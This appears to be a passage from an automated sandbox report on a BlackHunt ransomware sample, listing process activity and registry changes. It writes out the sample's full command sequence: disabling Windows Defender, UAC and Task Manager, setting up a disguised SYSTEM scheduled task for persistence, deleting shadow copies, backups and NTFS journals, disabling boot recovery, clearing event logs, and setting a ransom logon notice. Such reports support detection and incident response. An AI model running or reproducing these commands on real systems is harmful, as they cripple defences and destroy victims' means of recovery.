PID 2568 wrote to memory of 1792 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 113 PID 2568 wrote to memory of 2740 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 111 PID 2568 wrote to memory of 2740 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 111 PID 5064 wrote to memory of 4900 5064 cmd.exe 112 PID 5064 wrote to memory of 4900 5064 cmd.exe 112 PID 3732 wrote to memory of 1368 3732 cmd.exe 115 PID 3732 wrote to memory of 1368 3732 cmd.exe 115 PID 2568 wrote to memory of 4972 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 116 PID 2568 wrote to memory of 4972 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 116 PID 2568 wrote to memory of 2556 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 118 PID 2568 wrote to memory of 2556 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 118 PID 2568 wrote to memory of 2260 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 120 PID 2568 wrote to memory of 2260 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 120 PID 2452 wrote to memory of 396 2452 cmd.exe 121 PID 2452 wrote to memory of 396 2452 cmd.exe 121 PID 2740 wrote to memory of 3556 2740 cmd.exe 123 PID 2740 wrote to memory of 3556 2740 cmd.exe 123 PID 2568 wrote to memory of 3068 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 124 PID 2568 wrote to memory of 3068 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 124 PID 1792 wrote to memory of 3972 1792 cmd.exe 125 PID 1792 wrote to memory of 3972 1792 cmd.exe 125 PID 2568 wrote to memory of 2224 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 127 PID 2568 wrote to memory of 2224 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 127 PID 2568 wrote to memory of 2436 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 129 PID 2568 wrote to memory of 2436 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 129 PID 2568 wrote to memory of 1352 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 131 PID 2568 wrote to memory of 1352 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 131 PID 2568 wrote to memory of 4692 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 139 PID 2568 wrote to memory of 4692 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 139 PID 2568 wrote to memory of 5116 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 132 PID 2568 wrote to memory of 5116 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 132 PID 4972 wrote to memory of 1256 4972 cmd.exe 134 PID 4972 wrote to memory of 1256 4972 cmd.exe 134 PID 2556 wrote to memory of 4904 2556 cmd.exe 138 PID 2556 wrote to memory of 4904 2556 cmd.exe 138 PID 2260 wrote to memory of 3780 2260 cmd.exe 135 PID 2260 wrote to memory of 3780 2260 cmd.exe 135 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:5116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F2⤵
- Modifies registry class
PID:4340 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F3⤵
- Creates scheduled task(s)
PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1648
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2116
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:10076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4312
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2184
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4616
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2496
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1696
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8356
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:11480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6540
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6136
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5776
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10444
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:13780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7648 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 13604⤵
- Program crash
PID:2408
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"2⤵PID:11848
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8648
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:11100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6868
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:12280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:8176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:11476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:8404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:10584
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:3280
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12972
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:15872
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8724
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e3decf77ea829a33e4bd13811690e11b dFVSYjBU5UKQYNwMQNBoqA.0.1.0.0.01⤵
- Enumerates connected drives
PID:4844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9212
-
